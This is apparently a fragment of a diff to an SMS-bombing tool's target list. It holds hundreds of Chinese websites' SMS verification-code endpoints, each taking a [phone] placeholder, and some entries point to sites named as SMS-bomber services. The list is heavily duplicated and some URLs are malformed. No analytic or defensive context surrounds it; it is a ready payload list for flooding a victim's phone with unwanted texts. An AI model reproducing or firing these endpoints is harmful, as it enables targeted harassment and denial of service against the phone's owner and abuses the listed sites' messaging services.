"http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://m.shanzhen.me/sz/index/smsverifyp?phone=[phone]", - "http://home.ecook.cn/user/getVerifyCode?phone=[phone]", - "http://www.v5kf.com/member/index/ajax_get_sms_code?mobile=[phone]", - "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "https://www.sxcfu.com/user/verifyPhone?phone=[phone]", - "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", - "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://home.ecook.cn/user/code?phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://m.shanzhen.me/sz/index/smsverifyp?phone=[phone]", - "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", - "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", - "http://bj1.xiangcloud.com.cn/customer/sms/?phone=[phone] &accessType=1&circleId=100000055", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", - "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", - "http://www.kl.cc/User/RegSendMobilMail?t=[phone]", - "http://www.xjggjy.com/platform/service/users/register/sendMessage?mobile=[phone]", - "http://www.mgff.com/passport/send_mobile_yzm?mobile=[phone]", - "http://member.med66.com/uc/smscode?phone=[phone]", - "http://passport3.pcgames.com.cn/passport3/api/sendVerificationCode.jsp?mobile=[phone]", - "http://hy.hryouxi.com/HRPF/website/sendSMS.do?phone=[phone]", - "https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.9460999953115119?phone=[phone]", - "http://www.hongzhoukan.com/ajax/check_tel_reg.php?mobile=[phone]", - "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", - "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", - "http://www.wandafilm.com/login.do?m=sendSms?mobile=[phone]", - "http://www.daquant.com/Member/Index/sendcodes?mobile=[phone]", - "http://www.ind4.net/pc/member/sendRegisterSms.do?phoneNumber=[phone] &_=1502021540432", - "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", - "http://cuckooshop.cn/SMS?phone=[phone]", - "http://www.chatm.com/userInfo/smsCode?mobilephone=[phone]", - "http://www.nswtt.org.cn/commonSms/send.do?mobile= [phone]", - "http://www.4008123123.com/phhs_ios/sendSmsCodeVip.action &accessType=1&circleId=100000055 username=[phone]", - "http://www.jsvideo.tv/sendMsg&type=1 mobile=[phone]", - "http://www.wish3d.com/chitAppValidate.action id=[phone]", - "http://www.12366.com/front/userInfo/sendRegisterMessage loginName=[phone]", - "http://www.qdnks.com/default/user/getvlcode &purpose=register act=get_verify&user_name=[phone]", - "http://app.doowinedu.com/Api/register.php &accountLogin.loginName= accountLogin.mobile=[phone]", - "http://jzplatform.com/distributor/sendcode_do.php e.account=[phone]", - "http://www.wjask.com/wj/req_phone_code&tem=register Mobile=[phone]", - "http://www.eshiptrading.com.cn/api/SMSSafeCode?mobile=[phone]", - "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone= [phone]", - "https://login.zbj.com/register/sendRegisterCode?sacc= [phone]", - "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", - "http://passport.ctrl.cn/sms/reg?mobile=[phone]", - "http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", - "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo= [phone]", - "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", - "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", - "http://wap.yunxin123.com/index/getregcode/bid/yunxin?mobile=[phone]", - "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", - "http://www.023jz.com/register/sendMobileCode.html?mobile=[phone]", - "https://login.10086.cn/chkNumberAction.action?userName=[phone]", - "http://forum.xitek.com/forum.php?mod=ajax&infloat=register&handlekey=register&action=vcode&inajax=1&fp=4155208328&check=80e5&mobile= [phone]", - "https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.4572958659946349?phone=[phone]", - "http://api.hiwemeet.com/register/auth_code?phone=[phone]", - "http://wsdj.baic.gov.cn/common/sms/vercode/send.do?mobile=[phone]", - "http://www.nacao.org.cn/eportal/ui?moduleId=692a74d178a7426180fa08f4b5531330&struts.portlet.action=/portlet/yzm!sendMsg.action&telPhone=[phone]&yzm=H137", - "https://passport.haochedai.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]", - "http://ffp.airchina.com.cn/app/generateSmscode?phoneNum=[phone]&t=0.5165145328970137", - "http://passport2.chaoxing.com/num/phonecode?phone=http://s.juntu.com/member/index/getLoginCode?mobile=[phone]", - "http://www.ksdao.com/sendMsgCode?mobile=[phone]", - "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", - "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone][phone]&lx=1", - "http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]&agent=9&_=1500773935216", - "http://www.yijiej.com/user/getVerifyCode?phone=[phone]", - "http://m.yuhuijob.com/skins/save_check.php?f=regyzm&uname=[phone]", - "http://m.ikuyu.cn/login/getvcode?phone=[phone]", - "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://www.v5kf.com/member/index/ajax_sms_code?mobile=[phone]", - "http://api.juewei.com//api/Verify/sendSms?_=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjpyeprwskgcihxbbx&phone=[phone]", - "http://www.wenbita.net/plugin.php?id=wq_smslogin&mod=sendcode&handlekey=bind&loginsubmit=yes&module=register&phone=[phone]", - "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", - "http://sso.toutiao.com/send_activation_code/?mobile=[phone]", - "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", - "http://bbs.fqlook.cn/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=7290e7db&mobile=[phone]", - "http://db.3z.cc/index.php?tp=front/reg&appid=0&pt=1&ver=2.2.4&imei=352286900745893&sign=c225f84dad88d1c3521fb0ec39e77d5c&op=verify&phone=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", - "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://sms.maogoo.cn/index.php?hm=[phone]", - "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjpyeprwskgcihxbbx&phone=[phone]", - "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", - "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://api.juewei.com//api/Verify/sendSms?_=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", - "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", - "http://john.huainanhai.com/mobile/send_mobile_code_v2?phone_no=86-[phone]", - "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", - "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://www.youmw.top/tool/dxhz/?hm=[phone]&ok=", - "http://zha.vvoso.com/honzhani.php?zha=[phone]&x=100", - "http://www.bjoil.com/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609&mobile=[phone]", - "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", - "http://bsdt.jhga.gov.cn/egov/jhwas/jsp/info/checkmobile.jsp?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", - "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]&from=5599", - "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://newweb.lumiai.com/api/isecurity/sms_captcha?mobile=[phone]", - "http://www.lxzbsjsm.com/auth/smscode.ashx?action=vd&aid=5813&mb=[phone]", - "http://lvyou.baidu.com/business/api/orderforward?callback=jQuery182032357188081368804_1490544543748&source=lvyou&phone=[phone]&qt=phone_captcha&sub_from=order_list&request_from=webapp&_=1490544543509", - "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", - "http://www.wsngo.com/reg/sendSmsCheck.html?phone=[phone]", - "http://www.iliangcang.com/i/mob_login?act=getCode&mobile=[phone]", - "http://m.nsyh001.com/user/ajax/Btnmobileverify?user_name=[phone]", - "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", - "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", - "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://newweb.lumiai.com/api/isecurity/sms_captcha?mobile=[phone]", - "http://www.lxzbsjsm.com/auth/smscode.ashx?action=vd&aid=5813&mb=[phone]", - "http://m.nsyh001.com/user/ajax/Btnmobileverify?user_name=[phone]", - "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", - "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", - "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", - "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", - "http://www.reedoun.com/os/user/getCode?mobile=[phone]&type=1", - "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", - "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", - "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", - "http://www.reedoun.com/os/user/getCode?mobile=[phone]&type=1", - "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://web.5zhuan.com/?ac=getmsgcode&cphone=[phone]", + "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", "http://hdh.10086.cn/pc/dynamic?phoneNumber=[phone]&imageCode=4551&type=login", - "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", - "http://www.shoujibao.uni-info.com.cn/send_register_verify.action?register_customer_name=[phone]", - "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", - "http://www.shoujibao.uni-info.com.cn/send_register_verify.action?register_customer_name=[phone]", - "http://test2.p10155.cn:8075/sendCode.ashx?phonenum=[phone]", - "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", - "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", - "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "http://reg.lenovo.com.cn/captcha/canSend?mobile=[phone]&callback=getMobileCode&_=1480296216538", - "http://www.wfggw.com/getcode.asp?num=&d&_=1480403250456", - "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", - "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", - "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "http://reg.lenovo.com.cn/captcha/canSend?mobile=[phone]&callback=getMobileCode&_=1480296216538", - "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", - "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", - "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", - "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", - "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", - "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", - "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", - "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", - "http://www.595959.wang/index.php/index/index/sendSms1?phone=[phone]", - "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", - "http://loan.ef008.cn/sms/sendSms?smsType=1&phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", - "http://m.1mi.cn/wap/user/mobile_verify.json?mobile=[phone]&flag=0&identifying=", - "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", - "http://api.midukanshu.com/auth/mobileVerify?mobile=[phone]", - "http://care.seewo.com/easicare/account/dynamic/code?userName=[phone]&isLogin=false", - 